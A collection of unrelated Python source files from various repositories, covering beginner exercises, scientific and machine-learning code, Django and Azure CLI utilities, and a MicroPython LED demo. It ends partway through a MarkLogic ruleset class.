|
SamuelNunesDev/starting_point_in_python
|
|
|
from datetime import date
d = dict()
d["Nome"] = input('Nome: ')
d["Idade"] = int(input('Ano de nascimento: '))
d["Idade"] = date.today().year - d["Idade"]
d["CTPS"] = int(input('CTPS: (0 não tem)'))
if d["CTPS"] != 0:
d["Ano de contratação"] = int(input('Ano de contratação: '))
d["Salario"] = float(input('Salário: R$'))
d["Aposentadoria"] = d["Idade"] + 35
for k, v in d.items():
if k in 'Salario':
print(f'{k}: R${v:.2f}')
elif k in 'Aposentadoria':
print(f'{k}: {v} anos')
else:
print(f'{k}: {v}')
else:
for k, v in d.items():
print(f'{k}: {v}')
|
|
examples/Ni__eam__born_exp_fs/preconditioning_3.5NN/test__configuration_file.py
|
|
|
|
import pytest
from pypospack.pyposmat.data import PyposmatConfigurationFile
configuration_fn = 'data/pyposmat.config.in'
config = PyposmatConfigurationFile()
config.read(filename=configuration_fn)
print(config.sampling_type)
print(config.configuration['sampling_type'])
|
|
src/scvmm/azext_scvmm/scvmm_utils.py
|
haroonf/azure-cli-extensions
|
|
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from azure.cli.core.azclierror import InvalidArgumentValueError
from azure.cli.core.commands.client_factory import get_subscription_id
from msrestazure.tools import is_valid_resource_id, resource_id
from azext_scvmm.scvmm_constants import (
EXTENDED_LOCATION_TYPE,
)
from .vendored_sdks.models import (
ExtendedLocation,
)
def get_resource_id(
cmd,
resource_group_name: str,
provider_name_space: str,
resource_type: str,
resource: str,
):
"""
Gets the resource id for the resource if name is given.
"""
if resource is None or is_valid_resource_id(resource):
return resource
return resource_id(
subscription=get_subscription_id(cmd.cli_ctx),
resource_group=resource_group_name,
namespace=provider_name_space,
type=resource_type,
name=resource,
)
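# Illustrative behaviour of get_resource_id (the resource group, namespace and names below are
# made-up examples, not values taken from this extension):
#   get_resource_id(cmd, 'my-rg', 'Microsoft.ScVmm', 'virtualMachines', 'vm01')
#     -> '/subscriptions/<sub-id>/resourceGroups/my-rg/providers/Microsoft.ScVmm/virtualMachines/vm01'
#   get_resource_id(cmd, 'my-rg', 'Microsoft.ScVmm', 'virtualMachines', <full resource id>)
#     -> the same resource id, returned unchanged (None is also passed through).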
def create_dictionary_from_arg_string(values, option_string=None):
"""
    Creates and returns a dictionary from a list of strings in KEY=VALUE format.
"""
params_dict = {}
for item in values:
try:
key, value = item.split('=', 1)
params_dict[key.lower()] = value
except ValueError as err:
raise InvalidArgumentValueError(
f'usage error: {option_string} KEY=VALUE [KEY=VALUE ...]'
) from err
return params_dict
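# Example (illustrative): for values=['Env=prod', 'Owner=IT Team'] and option_string='--tags',
# the function returns {'env': 'prod', 'owner': 'IT Team'}; an item without '=' (e.g. 'Env')
# raises InvalidArgumentValueError('usage error: --tags KEY=VALUE [KEY=VALUE ...]').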
def get_extended_location(custom_location):
return ExtendedLocation(
type=EXTENDED_LOCATION_TYPE,
name=custom_location,
)
|
|
|
enade-istyastono/PyPLIF-HIPPOS
|
|
|
#!/usr/bin/env python
from __future__ import print_function
import sys
from time import time
from initialize.parse_conf import parse_config
from ifp_processing import get_bitstring
from similarity import count_abcdp, how_similar
def replace_bit_char(bitstring, bit_index_list):
for i, v in enumerate(bit_index_list):
if v == 1:
bitstring = bitstring[:i] + "n" + bitstring[i+1:]
return bitstring
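# Example (illustrative): replace_bit_char("10110", [0, 1, 0, 0, 1]) returns "1n11n" --
# every position flagged with 1 in bit_index_list is masked with the character "n".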
def main():
x = time()
"""
Steps:
1. Read HIPPOS config file
2. Read docking config file
3. Get docking result
4. Get bitstring by analyzing docking result
5. Write basic info to log and output file
6. Write bitstring (and similarity) to output file
"""
hippos_config = parse_config()
logfile = open(hippos_config["logfile"], "w") # Output #4
"""
Parse docking configuration file
Get docking results:
protein ==> OBMol Object
docked_ligands ==> List of OBMol
docked_proteins ==> List of OBMol (only for PLANTS)
mollist ==> List of ligand name + pose number
scorelist ==> List of docking score
"""
if hippos_config["docking_method"] == "plants":
from initialize.parse_docking_conf import parse_plants_conf
docking_conf = hippos_config["docking_conf"]
docking_results = parse_plants_conf(docking_conf)
else:
from initialize.parse_docking_conf import parse_vina_conf
docking_conf = hippos_config["docking_conf"]
docking_results = parse_vina_conf(docking_conf)
    # Check the docking output; if none was found, exit.
if len(docking_results["docked_ligands"]) == 0:
missing_docking_output = (
"The docking output could not be found. Please check your docking result."
)
print(missing_docking_output)
logfile.write(missing_docking_output)
logfile.close()
sys.exit(1)
"""
Get Bitstring using docking results & hippos configuration
bitstrings ==> Dictionary, with resname as key
Residue object as value
"""
bitstrings = get_bitstring(docking_results, hippos_config)
# Write Output & Log files
scorelist = docking_results["scorelist"]
ligand_pose = []
if hippos_config["docking_method"] == "plants":
for mol in docking_results["mollist"]:
mol = mol.split("_")
new_name = mol[0] + "_" + mol[-1]
ligand_pose.append(new_name)
if hippos_config["docking_method"] == "vina":
ligand_pose = docking_results["mollist"]
# set flag for every chosen output mode
output_mode = hippos_config["output_mode"]
simplified_flag = output_mode["simplified"]
full_flag = output_mode["full"]
full_nobb_flag = output_mode["full_nobb"]
# set file handler for every chosen output mode
if simplified_flag:
simplified_outfile = open(hippos_config["simplified_outfile"], "w") # Output #1
if full_flag:
full_outfile = open(hippos_config["full_outfile"], "w") # Output #2
if full_nobb_flag:
full_nobb_outfile = open(hippos_config["full_nobb_outfile"], "w") # Output #3
# write ligand info and similarity coef info
logfile.write(
"Ligand name is %s with %s poses\n\n"
% (ligand_pose[0].split("_")[0], len(ligand_pose))
) # Output Logfile
similarity_coef = hippos_config["similarity_coef"]
if similarity_coef:
sim_outfile = open(hippos_config["sim_outfile"], "w") # Output #5
logfile.write(
"similarity coefficient used are %s\n" % (", ".join(similarity_coef))
) # Output Logfile
# if simplified then write the length and position for each bitstring
if simplified_flag:
logfile.write(
"%s %s %s %s\n" % ("RESNAME", "length", "startbit", "endbit")
) # Output Logfile
# Iterate through pose and write the ligand+pose, docking score,
# similarity coef, bitstring
log_flag = True
bitstring_zero = False
for pose, (ligand_name, score) in enumerate(zip(ligand_pose, scorelist)):
ligand_name = ligand_name.replace(" ", "_").ljust(16)
score = score.ljust(9)
simp_bits = ""
full_bits = ""
nobb_bits = ""
# Concatenate bitstring from every residue, then write to their respective
# output file
bit_start = 1
for resname in hippos_config["residue_name"]:
bit_replace_index = bitstrings[resname].bit_replace_index
simp_bit_replace_index = bitstrings[resname].simp_bit_replace_index
if simplified_flag:
simp_res_bit = bitstrings[resname].simp_bits_list[pose].to01()
if bool(sum(simp_bit_replace_index)):
simp_res_bit = replace_bit_char(simp_res_bit, simp_bit_replace_index)
simp_bits += simp_res_bit
if full_flag:
full_res_bit = bitstrings[resname].full_bits_list[pose].to01()
if bool(sum(bit_replace_index)):
full_res_bit = replace_bit_char(full_res_bit, bit_replace_index)
full_bits += full_res_bit
if full_nobb_flag:
nobb_res_bit = bitstrings[resname].full_nobb_list[pose].to01()
if bool(sum(bit_replace_index)):
nobb_res_bit = replace_bit_char(nobb_res_bit, bit_replace_index)
nobb_bits += nobb_res_bit
if log_flag & simplified_flag:
bitlength = len(simp_res_bit)
bit_end = bit_start + bitlength - 1
logfile.write(
"%-10s %-6s %-7s %s\n" % (resname, bitlength, bit_start, bit_end)
) # Output Logfile
bit_start += bitlength
log_flag = False
if simplified_flag:
simplified_outfile.write("%s %s %s\n" % (ligand_name, score, simp_bits))
if full_flag:
full_outfile.write("%s %s %s\n" % (ligand_name, score, full_bits))
if full_nobb_flag:
full_nobb_outfile.write("%s %s %s\n" % (ligand_name, score, nobb_bits))
# If similarity coef requested => calculate abcd and p
if similarity_coef:
abcdp_list = []
coefficient = []
if full_flag:
for full in hippos_config["full_ref"]:
abcdp_list.append(count_abcdp(full, full_bits))
elif full_nobb_flag:
for nobb in hippos_config["full_nobb_ref"]:
abcdp_list.append(count_abcdp(nobb, nobb_bits))
else:
for simp in hippos_config["simplified_ref"]:
abcdp_list.append(count_abcdp(simp, simp_bits))
for sim_coef in similarity_coef:
for abcdp in abcdp_list:
similarity_value = how_similar(abcdp, sim_coef)
try:
coefficient.append("%.3f" % similarity_value)
except TypeError:
coefficient.append("%s" % similarity_value)
bitstring_zero = True
sim_outfile.write(
"%s %s\n" % (ligand_name, " ".join(coefficient))
) # Output Similarity
# Close all file
if simplified_flag:
simplified_outfile.close()
if full_flag:
full_outfile.close()
if full_nobb_flag:
full_nobb_outfile.close()
if similarity_coef:
sim_outfile.close()
y = time()
z = y - x
if bitstring_zero:
        bitstring_error = """
It appears that one of the target or reference bitstrings is all zero.
Check the ligand poses that generate the 'NA' values.
"""
print(bitstring_error)
logfile.write(bitstring_error)
print("Total time taken %.3f s." % z)
logfile.write("\nTotal time taken %.3f s." % z)
logfile.close()
if __name__ == "__main__":
main()
|
|
src/utils/accelerator/core.py
|
iaeiou/awesome-hugo-themes
|
|
|
# -*- coding: utf-8 -*-
# Time : 2021/10/3 8:59
# Author : QIN2DIM
# Github : https://github.com/QIN2DIM
# Description:
import gevent
from gevent.queue import Queue
class CoroutineSpeedup:
def __init__(self, work_q: Queue = None, task_docker=None, power: int = None, debug: bool = True):
        # Task container: queue
self.work_q = work_q if work_q else Queue()
self.done_q = Queue()
        # Task container: iterator
self.task_docker = task_docker
        # Number of coroutines
self.power = power
        # Whether to print log messages
self.debug_logger = debug
        # Size of the task queue when fully loaded
self.max_queue_size = 0
def launch(self):
while not self.work_q.empty():
task = self.work_q.get_nowait()
self.control_driver(task)
def control_driver(self, task):
"""
        Override this method to perform the per-task work.
@param task:
@return:
"""
def preload(self):
"""
:return:
"""
def offload_task(self):
"""
@return:
"""
if self.task_docker:
for task in self.task_docker:
self.work_q.put_nowait(task)
self.max_queue_size = self.work_q.qsize()
def killer(self):
"""
@return:
"""
pass
def go(self, power: int = 8) -> None:
"""
        @param power: coroutine concurrency (number of greenlets to spawn)
@return:
"""
        # Load tasks into the queue
self.preload()
self.offload_task()
task_list = []
        # Configure the effective concurrency (bounded by the queue size)
power_ = self.power if self.power else power
if self.max_queue_size != 0:
power_ = self.max_queue_size if power_ > self.max_queue_size else power_
self.power = power_
        # Start the tasks
for _ in range(power_):
task = gevent.spawn(self.launch)
task_list.append(task)
gevent.joinall(task_list)
        # Clean up cached resources
self.killer()
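# A minimal usage sketch (illustrative; the Doubler subclass and its task below are hypothetical).
# Subclasses override control_driver() to do the per-task work, feed tasks via task_docker
# (any iterable) or work_q, then call go():
#
#     class Doubler(CoroutineSpeedup):
#         def control_driver(self, task):
#             self.done_q.put_nowait(task * 2)
#
#     ds = Doubler(task_docker=range(100))
#     ds.go(power=8)
#     while not ds.done_q.empty():
#         print(ds.done_q.get_nowait())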
|
|
|
|
|
|
# coding: utf-8
'''Fauzi, <EMAIL>'''
from app.model import db, CRUD
class Role(db.Model, CRUD):
__tablename__ = 'role'
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(250), nullable=True, unique=True)
description = db.Column(db.String(250))
user = db.relationship('User', backref='role', lazy='dynamic')
def __repr__(self):
return '<Role %s>' % self.name
|
|
|
|
|
|
from bicubic_pytorch import core
from config import get_config
from model import common
import torch
from torch import nn
from torch.nn import init
class VDSR(nn.Module):
def __init__(
self,
depth: int=20,
n_colors: int=3,
n_feats: int=64,
conv=common.default_conv) -> None:
super().__init__()
m = []
block = lambda x, y: common.BasicBlock(x, y, 3)
m.append(block(n_colors, n_feats))
for _ in range(depth - 2):
m.append(block(n_feats, n_feats))
m.append(conv(n_feats, n_colors, 3))
self.convs = nn.Sequential(*m)
for m in self.modules():
if isinstance(m, nn.Conv2d):
init.kaiming_normal_(m.weight)
m.bias.data.fill_(0)
return
@staticmethod
def get_kwargs(cfg, conv=common.default_conv) -> dict:
parse_list = ['depth', 'n_colors', 'n_feats']
kwargs = get_config.parse_namespace(cfg, *parse_list)
kwargs['conv'] = conv
return kwargs
def forward(self, x: torch.Tensor, scale: float) -> torch.Tensor:
with torch.no_grad():
x = core.imresize(x, scale=scale, kernel='cubic')
x = x + self.convs(x)
return x
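# Minimal usage sketch (shapes and values are illustrative, assuming the config/common modules
# imported above are available):
#
#     net = VDSR(depth=20, n_colors=3, n_feats=64)
#     lr = torch.rand(1, 3, 32, 32)      # a low-resolution RGB batch
#     sr = net(lr, scale=2.0)            # bicubic upsample x2, then residual refinement
#     print(sr.shape)                    # expected [1, 3, 64, 64] if the convs preserve size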
|
|
S4/S4 Decompiler/decompyle3/parsers/reducecheck/__init__.py
|
|
|
|
from decompyle3.parsers.reducecheck.and_check import *
from decompyle3.parsers.reducecheck.and_cond_check import *
from decompyle3.parsers.reducecheck.and_not_check import *
from decompyle3.parsers.reducecheck.break38 import *
from decompyle3.parsers.reducecheck.if_and_stmt import *
from decompyle3.parsers.reducecheck.if_and_elsestmt import *
from decompyle3.parsers.reducecheck.ifelsestmt import *
from decompyle3.parsers.reducecheck.iflaststmt import *
from decompyle3.parsers.reducecheck.ifstmt import *
from decompyle3.parsers.reducecheck.ifstmts_jump import *
from decompyle3.parsers.reducecheck.for38 import *
from decompyle3.parsers.reducecheck.lastc_stmt import *
from decompyle3.parsers.reducecheck.list_if_not import *
from decompyle3.parsers.reducecheck.not_or_check import *
from decompyle3.parsers.reducecheck.or_check import *
from decompyle3.parsers.reducecheck.or_cond_check import *
from decompyle3.parsers.reducecheck.pop_return import *
from decompyle3.parsers.reducecheck.testtrue import *
from decompyle3.parsers.reducecheck.c_tryelsestmt import *
from decompyle3.parsers.reducecheck.tryexcept import *
from decompyle3.parsers.reducecheck.while1elsestmt import *
from decompyle3.parsers.reducecheck.while1stmt import *
from decompyle3.parsers.reducecheck.whilestmt import *
|
|
dataset/correct_h5_name.py
|
vuhoangminh/medical-segmentation
|
|
|
import os
import glob
from unet3d.utils.path_utils import get_project_dir, get_h5_training_dir
from brats.config import config
CURRENT_WORKING_DIR = os.path.realpath(__file__)
PROJECT_DIR = get_project_dir(CURRENT_WORKING_DIR, config["project_name"])
BRATS_DIR = os.path.join(PROJECT_DIR, config["brats_folder"])
DATASET_DIR = os.path.join(PROJECT_DIR, config["dataset_folder"])
for h5_path in glob.glob(os.path.join(BRATS_DIR, "database", "*", "*.h5")):
    # print(h5_path)
    print("old name:", h5_path)
    if "norm-minh" in h5_path:
        new_name = h5_path.replace("norm-minh", "norm-01_hist-1")
    elif "norm-z" in h5_path:
        new_name = h5_path.replace("norm-z", "norm-z-old_hist-0")
    else:
        continue  # skip files without a known normalization tag
    print(">> rename to:", new_name)
    os.rename(h5_path, new_name)
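# Illustrative effect (file names are made up):
#   .../database/brats/t1_norm-minh_hist.h5  ->  .../database/brats/t1_norm-01_hist-1_hist.h5
#   .../database/brats/t1_norm-z_hist.h5     ->  .../database/brats/t1_norm-z-old_hist-0_hist.h5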
|
|
哥伦布(STM32F407)/1.基础实验/2.流水灯/v2.0/main.py
|
01studio-lab/MicroPython_Examples
|
|
|
'''
Experiment: running LEDs (LED marquee)
Version: v2.0
Date: 2020.12
Author: 01Studio
'''
from pyb import LED, delay  # import the LED and delay functions from the pyb module
# Equivalent to "for i in [2, 3, 4]": LED(i).off() runs three times, for LEDs 2, 3 and 4
for i in range(2, 5):
    LED(i).off()
while True:
    # use a for loop
    for i in range(2, 5):
        LED(i).on()
        delay(1000)  # delay for 1000 milliseconds, i.e. 1 second
        LED(i).off()
|
|
src/python/entity_align/utils/PrintBestResults.py
|
amnda-d/learned-string-alignments
|
|
|
"""
Copyright (C) 2017-2018 University of Massachusetts Amherst.
This file is part of "learned-string-alignments"
http://github.com/iesl/learned-string-alignments
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import sys
import json
import os
from collections import defaultdict
from entity_align.utils.Config import Config
if __name__ == "__main__":
file_of_scores = sys.argv[1]
only_best = True if len(sys.argv) > 2 and sys.argv[2] == "True" else False
score_objs = []
with open(file_of_scores, 'r') as fin:
for line in fin:
js = json.loads(line.strip())
c = Config()
c.__dict__ = js['config']
js['config'] = c
score_objs.append(js)
for js in score_objs:
print("{}\t{}\t{}\t{}".format(js['config'].model_name, js['config'].dataset_name, "MAP", js['map']))
print("{}\t{}\t{}\t{}".format(js['config'].model_name, js['config'].dataset_name, "HITS@1", js['hits_at_1']))
print("{}\t{}\t{}\t{}".format(js['config'].model_name, js['config'].dataset_name, "HITS@10", js['hits_at_10']))
print("{}\t{}\t{}\t{}".format(js['config'].model_name, js['config'].dataset_name, "HITS@50", js['hits_at_50']))
|
|
python/kata/5-kyu/RGB To Hex Conversion/main.py
|
Carlososuna11/codewars-handbook
|
|
|
import codewars_test as test
from solution import rgb
test.assert_equals(rgb(0,0,0),"000000", "testing zero values")
test.assert_equals(rgb(1,2,3),"010203", "testing near zero values")
test.assert_equals(rgb(255,255,255), "FFFFFF", "testing max values")
test.assert_equals(rgb(254,253,252), "FEFDFC", "testing near max values")
test.assert_equals(rgb(-20,275,125), "00FF7D", "testing out of range values")
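# One possible solution these assertions exercise (illustrative, not the kata's reference answer):
#
#     def rgb(r, g, b):
#         clamp = lambda v: max(0, min(255, v))
#         return "{:02X}{:02X}{:02X}".format(clamp(r), clamp(g), clamp(b))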
|
|
|
dimst23/RadioTelescope_CommandLine
|
|
|
#!/usr/local/bin/python
import User_Interface
import configData
import TCPClient
import logData
import sys
if __name__ == '__main__':
#Exception handling section for the log file code
try:
logdata = logData.logData(__name__)
except:
print("There is a problem with the handling of the log file. See log file for the traceback of the exception.\n")
logdata.log("EXCEPT", "There is a problem with the handling of the log file. Program terminates.", __name__)
exit(1) #Terminate the script
#Exception handling code for the XML file process
try:
cfgData = configData.confData("settings.xml")
except:
print("There is a problem with the XML file handling. See log file for the traceback of the exception.\n")
logdata.log("EXCEPT", "There is a problem with the XML file handling. Program terminates.", __name__)
exit(1) #Terminate the script
#Exception handling code for the TCP initial setup
try:
tcpClient = TCPClient.TCPClient(cfgData)
except:
print("There is a problem with the TCP handling. See log file for the traceback of the exception.\n")
logdata.log("EXCEPT", "There is a problem with the TCP handling. Program terminates.", __name__)
exit(1) #Terminate the script
#General exception handling code
try:
User_Interface.uInterface(cfgData, tcpClient) #Initiate the user interface
except KeyboardInterrupt:
print("User requested termination with a keyboard interrupt.\n")
logdata.log("EXCEPT", "User requested termination with a keyboard interrupt.", __name__)
tcpClient.disconnect()
exit(0) #Terminate the script
except:
print("Something really bad happened!! We should terminate.\n")
logdata.log("EXCEPT", "Something really bad happened!! See the traceback below.", __name__)
exit(1) #Terminate the script
logdata.logClose() #Terminate all logging operations before exiting the script
|
|
|
|
|
|
import re
import os
from ratelimit.decorators import ratelimit
from iBird import settings
from apps.prediction.neural_network.predict_server import NeuralNetwork
from apps.utils.decorator import RequiredMethod, RequiredParameters, Protect
from apps.utils.response_processor import process_response
from apps.utils.response_status import ResponseStatus, ValueErrorStatus
from apps.prediction import models as prediction_models
# Recognition network
net = NeuralNetwork(settings.MODEL_PATH, settings.CLASSES_PATH)
@Protect
@RequiredMethod('POST')
@ratelimit(**settings.RATE_LIMIT_LEVEL_1)
@RequiredParameters('path')
def predict(request):
json_data = request.json_data
status = ValueErrorStatus.check_value_type(json_data)
if status is not None:
return process_response(request, status)
path = json_data['path']
if len(path) > 100 or re.search(r'\.\.', path) or path[:9] != '/' + settings.PICTURE_PATH \
or not os.path.exists('.' + path):
return process_response(request, ResponseStatus.IMAGE_PATH_NOT_FOUND_ERROR)
report = prediction_models.Report.objects.filter(path=path).first()
if not report:
report = prediction_models.Report(path=path)
report.result = net.predicted('.' + path)
report.save()
request.data = report.transform_into_serialized_data()
return process_response(request, ResponseStatus.OK)
@Protect
@RequiredMethod('GET')
@ratelimit(**settings.RATE_LIMIT_LEVEL_3)
def get_report(request):
sequence = request.GET.get('sequence')
if not sequence:
return process_response(request, ResponseStatus.SEQUENCE_REQUIRED_ERROR)
status = ValueErrorStatus.check_value_type({'sequence': sequence})
if status is not None:
return process_response(request, status)
sequence = int(sequence)
report = prediction_models.Report.objects.filter(id=sequence).first()
if not report:
return process_response(request, ResponseStatus.REPORT_NOT_EXISTED_ERROR)
request.data = report.transform_into_serialized_data()
return process_response(request, ResponseStatus.OK)
@Protect
@RequiredMethod('GET')
@ratelimit(**settings.RATE_LIMIT_LEVEL_3)
def get_bird_info(request):
bird_id = request.GET.get('bird_id')
if not bird_id:
return process_response(request, ResponseStatus.BIRD_ID_REQUIRED_ERROR)
status = ValueErrorStatus.check_value_type({'bird_id': bird_id})
if status is not None:
return process_response(request, status)
bird_id = int(bird_id)
if not 1 <= bird_id <= 200:
return process_response(request, ResponseStatus.BIRD_ID_NOT_EXISTED_ERROR)
bird = prediction_models.Bird.objects.filter(id=bird_id).first()
request.data = bird.transform_into_serialized_data()
return process_response(request, ResponseStatus.OK)
|
|
scripts/npc/backToVictoria.py
|
|
|
|
map = 104020000
if sm.getFieldID() != 120040000:
map = 120040000
if sm.sendAskYesNo("Would you like to go to #m" + str(map) + "#?"):
sm.warp(map, 0)
|
|
gnosis/catalog/views/views_people.py
|
|
|
|
from django.contrib.auth.decorators import login_required
from django.contrib.admin.views.decorators import staff_member_required
from django.shortcuts import render
from catalog.models import Person, Paper
from catalog.forms import PersonForm
from catalog.forms import SearchPeopleForm
from django.urls import reverse
from django.http import HttpResponseRedirect
from neomodel import db
from django.shortcuts import redirect
from django.contrib import messages
def _person_find(person_name, exact_match=False):
"""
Searches the DB for a person whose name matches the given name
:param person_name:
:return:
"""
person_name = person_name.lower()
person_name_tokens = [w for w in person_name.split()]
if exact_match:
if len(person_name_tokens) > 2:
query = "MATCH (p:Person) WHERE LOWER(p.last_name) IN { person_tokens } AND LOWER(p.first_name) IN { person_tokens } AND LOWER(p.middle_name) IN { person_tokens } RETURN p LIMIT 20"
else:
query = "MATCH (p:Person) WHERE LOWER(p.last_name) IN { person_tokens } AND LOWER(p.first_name) IN { person_tokens } RETURN p LIMIT 20"
else:
query = "MATCH (p:Person) WHERE LOWER(p.last_name) IN { person_tokens } OR LOWER(p.first_name) IN { person_tokens } OR LOWER(p.middle_name) IN { person_tokens } RETURN p LIMIT 20"
results, meta = db.cypher_query(query, dict(person_tokens=person_name_tokens))
if len(results) > 0:
print("Found {} matching people".format(len(results)))
people = [Person.inflate(row[0]) for row in results]
return people
else:
return None
def person_find(request):
"""
Searching for a person in the DB.
:param request:
:return:
"""
print("Calling person_find")
people_found_ids = []
message = None
storage = messages.get_messages(request=request)
for request_message in storage:
people_found_ids = request_message.message
print("IDs of people found: {}".format(people_found_ids))
people_found_ids = people_found_ids.split(",")
break
people = []
if len(people_found_ids) > 0:
people = Person.nodes.filter(uid__in=people_found_ids)
print("Retrieved {} people from the database".format(len(people)))
if request.method == "POST":
form = SearchPeopleForm(request.POST)
print("Received POST request")
if form.is_valid():
people = _person_find(form.cleaned_data["person_name"])
if people is not None:
return render(request, "person_find.html", {"people": people, "form": form, "message": message})
else:
message = "No results found. Please try again!"
elif request.method == "GET":
print("Received GET request")
form = SearchPeopleForm()
return render(request, "person_find.html", {"people": people, "form": form, "message": message})
#
# Person Views
#
def persons(request):
people = Person.nodes.order_by("-created")[:50]
message = None
if request.method == "POST":
form = SearchPeopleForm(request.POST)
print("Received POST request")
if form.is_valid():
print("Valid form")
people_found = _person_find(form.cleaned_data["person_name"])
if people_found is not None:
#print("Found people. Rendering person_find.html")
people_found_ids = [person.uid for person in people_found]
#print("ids as string {}".format(",".join(str(pid) for pid in people_found_ids)))
messages.add_message(request, messages.INFO, ",".join(str(pid) for pid in people_found_ids))
return redirect("person_find")
# return render(
# request,
# "person_find.html",
# {"people": people_found, "form": form, "message": ""},
# )
else:
message = "No results found. Please try again!"
elif request.method == "GET":
print("Received GET request")
form = SearchPeopleForm()
return render(
request, "people.html", {"people": people, "form": form, "message": message}
)
def person_detail(request, id):
# Retrieve the paper from the database
papers_authored = []
query = "MATCH (a) WHERE ID(a)={id} RETURN a"
results, meta = db.cypher_query(query, dict(id=id))
if len(results) > 0:
        # There should be only one result because IDs are unique. We check that at least one
        # result was returned and take the first as the correct match. len(results) > 1 should
        # never happen since IDs are unique; for the MVP we ignore that case and continue, but
        # ultimately we should check for it and fail gracefully.
all_people = [Person.inflate(row[0]) for row in results]
person = all_people[0]
else: # go back to the paper index page
return render(
request,
"people.html",
{"people": Person.nodes.all(), "num_people": len(Person.nodes.all())},
)
#
# Retrieve all papers co-authored by this person and list them
#
query = "MATCH (a:Person)-[r:authors]->(p:Paper) where id(a)={id} return p"
results, meta = db.cypher_query(query, dict(id=id))
if len(results) > 0:
papers_authored = [Paper.inflate(row[0]) for row in results]
print("Number of papers co-authored by {}: {}".format(person.last_name, len(papers_authored)))
for p in papers_authored:
print("Title: {}".format(p.title))
else:
print("No papers found for author {}".format(person.last_name))
request.session["last-viewed-person"] = id
return render(request, "person_detail.html", {"person": person, "papers": papers_authored})
@login_required
def person_create(request):
user = request.user
if request.method == "POST":
person = Person()
person.created_by = user.id
form = PersonForm(instance=person, data=request.POST)
if form.is_valid():
form.save()
return HttpResponseRedirect(reverse("persons_index"))
else: # GET
form = PersonForm()
return render(request, "person_form.html", {"form": form})
@login_required
def person_update(request, id):
# retrieve paper by ID
# https://github.com/neo4j-contrib/neomodel/issues/199
query = "MATCH (a) WHERE ID(a)={id} RETURN a"
results, meta = db.cypher_query(query, dict(id=id))
if len(results) > 0:
all_people = [Person.inflate(row[0]) for row in results]
person_inst = all_people[0]
else:
person_inst = Person()
# if this is POST request then process the Form data
if request.method == "POST":
form = PersonForm(request.POST)
if form.is_valid():
person_inst.first_name = form.cleaned_data["first_name"]
person_inst.middle_name = form.cleaned_data["middle_name"]
person_inst.last_name = form.cleaned_data["last_name"]
person_inst.affiliation = form.cleaned_data["affiliation"]
person_inst.website = form.cleaned_data["website"]
person_inst.save()
return HttpResponseRedirect(reverse("persons_index"))
# GET request
else:
query = "MATCH (a) WHERE ID(a)={id} RETURN a"
results, meta = db.cypher_query(query, dict(id=id))
if len(results) > 0:
all_people = [Person.inflate(row[0]) for row in results]
person_inst = all_people[0]
else:
person_inst = Person()
form = PersonForm(
initial={
"first_name": person_inst.first_name,
"middle_name": person_inst.middle_name,
"last_name": person_inst.last_name,
"affiliation": person_inst.affiliation,
"website": person_inst.website,
}
)
return render(request, "person_update.html", {"form": form, "person": person_inst})
# should limit access to admin users only!!
@staff_member_required
def person_delete(request, id):
print("WARNING: Deleting person id {} and all related edges".format(id))
# Cypher query to delete the paper node
query = "MATCH (p:Person) WHERE ID(p)={id} DETACH DELETE p"
results, meta = db.cypher_query(query, dict(id=id))
return HttpResponseRedirect(reverse("persons_index"))
|
|
programs/testing with cam.py
|
Anurag-Varma/face-recognition-with-and-without-mask
|
|
|
# -*- coding: utf-8 -*-
"""
Created on Tue Sep 15 20:01:17 2020
@author: panur
"""
import cv2
import numpy as np
from keras.models import model_from_json
from keras.preprocessing.image import img_to_array
#load model
model = model_from_json(open("fer.json", "r").read())
#load weights
model.load_weights('fer.h5')
detection_model_path="C:/Users/panur/facedetection/haarcascade_frontalface_default.xml"
face_detection = cv2.CascadeClassifier(detection_model_path)
video="C:/Users/panur/Downloads/withmask_1602-18-737-006.mp4"
ret=1
flag=True
cap = cv2.VideoCapture(1)
#frameRate = cap.get(30)
while(ret!=0 and cap.isOpened()):
ret, fm=cap.read()
cv2.imwrite('live_test_img.jpg', fm)
fm = cv2.resize(fm, (200, 200))
file = cv2.cvtColor(fm, cv2.COLOR_BGR2RGB)
orig_frame = file
frame = file
faces = face_detection.detectMultiScale(frame,scaleFactor=1.1,minNeighbors=5,minSize=(30,30),flags=cv2.CASCADE_SCALE_IMAGE)
i=0
test=""
if (len(faces)) :
faces = sorted(faces, reverse=True,key=lambda x: (x[2] - x[0]) * (x[3] - x[1]))[0]
(fX, fY, fW, fH) = faces
roi = frame[fY:fY + fH, fX:fX + fW]
roi = cv2.resize(roi, (200, 200),3)
roi = frame.astype("float") / 255.0
roi = img_to_array(roi)
roi = np.expand_dims(roi, axis=0)
preds=model.predict_classes(roi)[0]
print(preds)
if preds==0:
print("withmask_anurag"+str(i))
test='withmask_anurag'
        elif preds == 1:
print("withoutmask_anurag"+str(i))
test='withoutmask_anurag'
i=i+1
cv2.putText(fm,test, (fX-15, fY - 10), cv2.FONT_HERSHEY_SIMPLEX, 0.45, (0, 0, 255), 2)
cv2.rectangle(fm, (fX, fY), (fX + fW, fY + fH),(0, 0, 255), 2)
file=fm
cv2.imshow("Live Video", fm)
k=cv2.waitKey(25)
if k == 27:
ret=0
break
print("closed")
cap.release()
cv2.destroyAllWindows()
|
|
marklogic/models/database/ruleset.py
|
paul-hoehne/MarkLogic_Python
|
|
|
# -*- coding: utf-8 -*-
#
# Copyright 2015 MarkLogic Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0#
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# File History
# ------------
#
# <NAME> 05/10/2015 Initial development
"""
Classes for dealing with rulesets.
"""
class RuleSet:
"""
A database rule set.
"""
def __init__(self, location):
"""
Create a rule set.
:param location: the ruleset location
"""
self._config = {
'location': location
}
def location(self):
"""
The location.
"""
return self._config['location']
def set_location(self, location):
"""
Set the location.
